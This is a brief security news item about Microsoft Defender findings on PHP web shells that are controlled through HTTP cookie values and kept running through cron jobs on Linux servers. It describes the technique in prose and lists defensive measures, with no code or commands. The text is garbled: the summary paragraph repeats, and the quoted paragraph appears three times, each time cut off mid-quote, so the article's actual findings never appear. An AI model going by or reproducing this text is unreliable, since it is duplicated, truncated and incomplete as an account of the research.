Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers

Microsoft Defender Security Research Team has identified a sophisticated web shell technique where threat actors use HTTP cookies as a covert control channel for PHP-based web shells on Linux servers. Unlike traditional web shells that expose commands via URL parameters, these malicious payloads remain hidden by requiring specific cookie values to trigger execution. The threat actors achieve persistence by scheduling the web shells through cron jobs on compromised systems. This approach enables remote code execution while evading standard detection methods that monitor URL-based command patterns. Organizations running PHP applications on Linux servers should implement robust input validation, monitor for suspicious cookie usage patterns, audit cron job configurations, and deploy web application firewalls to detect anomalous traffic indicative of this stealthy attack vector.

Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team. "Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution,

Microsoft Defender Security Research Team has identified a sophisticated web shell technique where threat actors use HTTP cookies as a covert control channel for PHP-based web shells on Linux servers. Unlike traditional web shells that expose commands via URL parameters, these malicious payloads remain hidden by requiring specific cookie values to trigger execution. The threat actors achieve persistence by scheduling the web shells through cron jobs on compromised systems. This approach enables remote code execution while evading standard detection methods that monitor URL-based command patterns. Organizations running PHP applications on Linux servers should implement robust input validation, monitor for suspicious cookie usage patterns, audit cron job configurations, and deploy web application firewalls to detect anomalous traffic indicative of this stealthy attack vector. Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team. "Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution, Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team. "Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution,